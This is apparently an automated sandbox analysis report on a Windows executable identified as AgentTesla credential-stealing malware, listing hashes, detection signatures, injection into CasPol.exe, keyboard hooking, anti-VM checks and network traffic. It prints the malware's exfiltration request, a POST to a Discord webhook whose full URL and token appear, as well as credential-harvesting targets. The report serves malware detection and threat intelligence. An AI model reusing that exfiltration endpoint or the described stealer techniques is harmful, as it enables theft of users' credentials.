Windows Analysis Report
e-dekont-20230206.exe

Overview

General Information

Sample Name: e-dekont-20230206.exe
Analysis ID: 800718
MD5: 33a5f92deee382035467caff29a8d487
SHA1: 7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
SHA256: e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
Tags: exegeoTUR
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: e-dekont-20230206.exe ReversingLabs: Detection: 41%
Source: e-dekont-20230206.exe Virustotal: Detection: 55% Perma Link
Machine Learning detection for sample
Source: e-dekont-20230206.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: e-dekont-20230206.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: FUCKYOU.pdb source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: NNbHhH.pdb source: e-dekont-20230206.exe
Source: Binary string: NNbHhH.pdbH source: e-dekont-20230206.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49703 -> 162.159.135.232:443
May check the online IP address of the machine
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe DNS query: name: api.ipify.org
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.185.227.155 64.185.227.155
Source: Joe Sandbox View IP Address: 64.185.227.155 64.185.227.155
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 17:41:32 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=a8ea0446a70e11ed8d802657744d3ae7; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/strict-transport-security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bty7akNoWX6OC4aoE2iHe7LxHQHtrn188ZjWicZIiSBh1heuF9zsXpH9biouDi8l7hbBetRLrMi7Ya7Ieov%2FahcmIdQSLBEYWkkXiRzLyJCYMmwGMyfI%2B0e3oFmC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __sdcfduid=a8ea0446a70e11ed8d802657744d3ae7c23a0232fc8c5f932fd4f6c1c91175609cee1f861eccdf03b6a96c0a50384823; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/Set-Cookie: __cfruid=7623650af91c9a0c1d05a6a7bc2a77b0906cb4ae-1675791692; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 795deabcc9628fdd-FRA{"message": "Unknown Webhook", "code": 10015}
Source: CasPol.exe, 00000001.00000002.560208417.0000000006262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://discord.com
Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com4Dp
Source: unknown HTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe Jump to behavior
Contains functionality to register a low level keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06B90290 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000 1_2_06B90290
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Code function: 0_2_00007FF9A5D90764 0_2_00007FF9A5D90764
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Code function: 0_2_00007FF9A5D96CAD 0_2_00007FF9A5D96CAD
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Code function: 0_2_00007FF9A5D90816 0_2_00007FF9A5D90816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A3C5B0 1_2_05A3C5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A317A0 1_2_05A317A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A31772 1_2_05A31772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A301A0 1_2_05A301A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A39328 1_2_05A39328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06B90D20 1_2_06B90D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06B99DF0 1_2_06B99DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06F442D0 1_2_06F442D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06F4E088 1_2_06F4E088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06F4B178 1_2_06F4B178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06F47C08 1_2_06F47C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06F48BC0 1_2_06F48BC0
PE file does not import any functions
Source: e-dekont-20230206.exe Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: e-dekont-20230206.exe, 00000000.00000000.291653847.0000022E8D92C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.296795377.0000022E9F6E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe, 00000000.00000002.295935631.0000022E8D9D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe Binary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
Source: e-dekont-20230206.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: e-dekont-20230206.exe ReversingLabs: Detection: 41%
Source: e-dekont-20230206.exe Virustotal: Detection: 55%
Source: e-dekont-20230206.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\e-dekont-20230206.exe C:\Users\user\Desktop\e-dekont-20230206.exe
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\e-dekont-20230206.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230206.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
Source: e-dekont-20230206.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: e-dekont-20230206.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: e-dekont-20230206.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: e-dekont-20230206.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: FUCKYOU.pdb source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: NNbHhH.pdb source: e-dekont-20230206.exe
Source: Binary string: NNbHhH.pdbH source: e-dekont-20230206.exe

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: e-dekont-20230206.exe, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs .Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs .Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs .Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Code function: 0_2_00007FF9A5D9826D push edi; retf 0_2_00007FF9A5D9826E
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Code function: 0_2_00007FF9A5D9821E push edi; retf 0_2_00007FF9A5D9821F
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Code function: 0_2_00007FF9A5D9890E push eax; retf 0_2_00007FF9A5D9890F
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Code function: 0_2_00007FF9A5D9841A push ebp; retf 0_2_00007FF9A5D9841B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A37C9A push eax; retf 1_2_05A37CA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A37499 push FFFFFF8Bh; iretd 1_2_05A3749E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A37CE0 pushfd ; retf 1_2_05A37CE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A38424 push esp; iretd 1_2_05A38829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A337B7 pushad ; iretd 1_2_05A337F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_05A37E40 push 6C66h; ret 1_2_05A37E5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06B9CF26 push es; retf 1_2_06B9CF2C
Binary contains a suspicious time stamp
Source: e-dekont-20230206.exe Static PE information: 0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.97077131969678
Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\e-dekont-20230206.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
